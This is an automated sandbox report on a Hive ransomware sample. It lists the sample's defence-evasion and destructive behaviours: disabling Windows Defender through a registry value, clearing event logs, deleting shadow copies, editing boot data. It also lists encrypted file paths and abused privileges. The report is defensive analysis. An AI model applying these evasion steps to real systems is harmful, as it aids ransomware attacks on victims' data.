Malware Analysis Report

2024-10-16 03:12

Sample ID 220113-qhf1ssaecp
Target dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413
SHA256 dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413
Tags
evasion ransomware trojan hive spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413

Threat Level: Known bad

The file dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413 was found to be: Known bad.

Malicious Activity Summary

evasion ransomware trojan hive spyware stealer

Deletes Windows Defender Definitions

Hive

Modifies Windows Defender Real-time Protection settings

Modifies security service

Clears Windows event logs

Deletes shadow copies

Modifies boot configuration data using bcdedit

Modifies extensions of user files

Reads user/profile data of web browsers

Launches sc.exe

Drops file in Program Files directory

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Interacts with shadow copies

Suspicious use of WriteProcessMemory

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-01-13 13:15

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-13 13:15

Reported

2022-01-13 13:20

Platform

win7-en-20211208

Max time kernel

19s

Max time network

16s

Command Line

"C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\photoedge_buttongraphic.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-search_ja.jar.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_yON8OUuNf6w0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\add_down.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Scene_loop.wmv C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsNotesBackground.wmv C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\de-DE\css\settings.css C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_BqLrzRE_XZU0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Windows Media Player\ja-JP\WMPDMC.exe.mui C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_left.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\acro20.lng.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_8DRUT4ZDHr80.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\vistabg.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Omsk.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_UXgU9VSg9yA0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Los_Angeles.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_lvpmm5TgBkg0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color120.jpg C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Windows Media Player\de-DE\wmpnetwk.exe.mui C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_settings.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_foggy.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\eclipse_update_120.jpg.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_NuGqTGRYZ9w0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiling.xml.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_HtTsxgTYzio0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\LightBlueRectangle.PNG C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-api_ja.jar.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_mM3D8vNbLhg0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Maceio.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_JesLK8qC4Xc0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Windows Media Player\es-ES\WMPDMC.exe.mui C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\settings.html C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\mip.exe.mui C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7Handle.png.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_nxmiqEHLXhg0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\dsn.jar.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_mwRNocGIRTU0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_zh_CN.jar.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_qpObUIThgjA0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-tabcontrol_zh_CN.jar.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_Fg4-7DZ1Y1k0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web\webbase.xml C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Pontianak.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_5XU08yWcQns0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Belize.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_9UKLnagsxJc0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\shuffle_down.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\ja-JP\js\settings.js C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\settings.html C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\15.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_hail.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\mng.txt.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_cFB09WKWJc80.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ar-SA\tipresx.dll.mui C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-selector-api.xml.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_2UoNOqxYoY40.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\DVD Maker\rtstreamsink.ax C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_0LGxak5gF140.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\ea-sym.xml C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_hPxadaAiJZQ0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_ja.jar.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_I0tyt2AufSQ0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\Vdk10.rst.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_Txa-NztkAvk0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX__Afg6nichYQ0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Common Files\System\msadc\en-US\msadcfr.dll.mui C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Full\pushplaysubpicture.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Samara.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_r7vtz-l-4Cw0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application_5.5.0.165303.jar.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_upIbecqDeQg0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt.nl_ja_4.4.0.v20140623020002.jar.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_BaFoJs1Tw0I0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host_zh_CN.jar.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_fI_ra2osplU0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Hand Prints.htm C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Green Bubbles.htm C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-multiview.xml.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_I_J1VdERECM0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Hearts\en-US\Hearts.exe.mui.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_Mh5Hsyb1e7w0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\en-US\SpiderSolitaire.exe.mui.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_T60PltQ5pXQ0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\css\weather.css C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nome.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_JOfUbhPDV0M0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.metadataprovider.exsd.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_D6OseAH5CrQ0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Rothera.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_AmaHDGD_IP80.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\dialdot.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1688 wrote to memory of 380 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\net.exe
PID 1688 wrote to memory of 380 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\net.exe
PID 1688 wrote to memory of 380 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\net.exe
PID 380 wrote to memory of 680 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 380 wrote to memory of 680 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 380 wrote to memory of 680 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1688 wrote to memory of 784 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\net.exe
PID 1688 wrote to memory of 784 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\net.exe
PID 1688 wrote to memory of 784 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\net.exe
PID 784 wrote to memory of 1704 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 784 wrote to memory of 1704 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 784 wrote to memory of 1704 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1688 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\net.exe
PID 1688 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\net.exe
PID 1688 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\net.exe
PID 620 wrote to memory of 572 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 620 wrote to memory of 572 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 620 wrote to memory of 572 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1688 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\net.exe
PID 1688 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\net.exe
PID 1688 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\net.exe
PID 1624 wrote to memory of 872 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
